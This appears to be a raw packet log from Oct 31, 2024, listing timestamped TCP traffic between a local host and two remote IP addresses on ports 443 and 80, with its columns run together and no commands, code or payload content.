                                                                            Oct 31, 2024 20:49:01.652662039 CET44349712188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.179945946 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.179980040 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.180052996 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.180417061 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.180433989 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.812305927 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.812504053 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.813817024 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.813827991 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.814054966 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.815659046 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.815810919 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.815839052 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:02.815895081 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:02.815901995 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:03.351504087 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:03.351602077 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:03.351691961 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:03.351913929 CET49713443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:03.351924896 CET44349713188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:03.589606047 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:03.589643955 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:03.589715958 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:03.590065002 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:03.590080023 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.205981016 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.206088066 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:04.207391977 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:04.207396984 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.207596064 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.208700895 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:04.208882093 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:04.208906889 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.208985090 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:04.208992958 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.867146015 CET44349715188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:04.867429972 CET49715443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:05.363667965 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:05.363693953 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:05.363769054 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:05.364110947 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:05.364124060 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.002625942 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.002696037 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:06.004122019 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:06.004131079 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.004365921 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.005583048 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:06.005902052 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:06.005909920 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.517642975 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.517734051 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:06.517807007 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:06.517971039 CET49716443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:06.517987013 CET44349716188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.002346039 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.002372980 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.002468109 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.002767086 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.002779961 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.653079987 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.653171062 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.654395103 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.654400110 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.654840946 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.656131029 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.656913996 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.656955957 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.657242060 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.657282114 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.657383919 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.657459021 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.657568932 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.657594919 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.657749891 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.658061981 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.658179045 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.658217907 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.658231974 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.658253908 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.658365011 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.658396006 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.658430099 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668261051 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.668332100 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668350935 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.668410063 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668442965 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668469906 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668484926 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.668518066 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668534040 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.668620110 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668641090 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:07.668661118 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.668675900 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:07.674036980 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:09.725389004 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:09.725637913 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:09.725707054 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:09.728075027 CET49727443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:09.728096962 CET44349727188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:09.738676071 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:09.738713980 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:09.738779068 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:09.739054918 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:09.739073038 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:10.360975981 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:10.361047029 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:10.362592936 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:10.362601995 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:10.362925053 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:10.364104986 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:10.364129066 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:10.364187002 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:11.041491985 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:11.041739941 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:11.041836023 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:11.041954994 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:11.041980982 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:11.042000055 CET49743443192.168.2.6188.114.97.3
                                                                            Oct 31, 2024 20:49:11.042006969 CET44349743188.114.97.3192.168.2.6
                                                                            Oct 31, 2024 20:49:11.043633938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.049446106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.049530983 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.049612045 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.054512024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988677025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988698006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988708973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988766909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.988944054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988955021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988965988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.988976955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.989021063 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.989175081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.989185095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.989196062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:11.989228964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.989274979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:11.994329929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.036926031 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.146107912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146138906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146151066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146167040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146178007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146190882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146190882 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.146260023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146270990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146279097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.146306038 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.146945000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.146998882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.147011995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.147068024 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.147181034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.147192001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.147222042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.193182945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.265233994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265439034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265455961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265470028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265484095 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.265517950 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.265572071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265583992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265594959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265620947 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.265690088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265702009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.265727043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.266750097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.266762018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.266803026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.311131954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.311160088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.311171055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.311212063 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.311374903 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.384170055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384260893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384272099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384315014 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.384462118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384471893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384510994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.384572983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384613037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.384615898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384627104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.384656906 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.384731054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.385229111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.385273933 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.385297060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.385308027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.385345936 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.429749966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.429800987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.429814100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.429877043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.429939985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.429992914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.503758907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.503853083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.503865957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.503952980 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.503982067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.503993988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.504046917 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.504215002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.504261017 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.504297972 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.504309893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.504343033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.504407883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.504420042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.504466057 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.549782038 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.549839973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.549851894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.549897909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.549987078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.549999952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.550044060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.634409904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634464025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634475946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634500027 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.634613037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634624958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634649992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.634840965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634881020 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.634929895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634943008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.634980917 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.635056019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.635068893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.635112047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.671824932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.671838999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.671849966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.671910048 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.672005892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.672017097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.672048092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.724433899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.741502047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741520882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741533995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741566896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741589069 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.741636992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.741673946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741771936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741816044 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.741832018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741844893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.741882086 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.741993904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.742005110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.742041111 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.789161921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.789201975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.789212942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.789299011 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.789345026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.789356947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.789407969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.789694071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.789745092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.860217094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.860250950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.860265970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.860354900 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:12.860377073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.860389948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:12.860441923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.012496948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.012557030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.012569904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.012638092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.012691975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.012703896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.012747049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.012902975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.012953043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.013006926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.013017893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.013065100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.013149023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.013160944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.013200045 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.013894081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.013966084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.013979912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.014018059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.014118910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.014131069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.014178038 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.014792919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.014820099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.014832020 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.014862061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.014904022 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.014941931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.027273893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.027359962 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.027389050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.028009892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.028063059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.028121948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.083811045 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.099052906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099086046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099097967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099169970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.099225044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099236965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099248886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099267960 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.099323034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.099438906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099464893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.099505901 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:13.131692886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:13.131714106 CET8049749185.215.113.16192.168.2.6
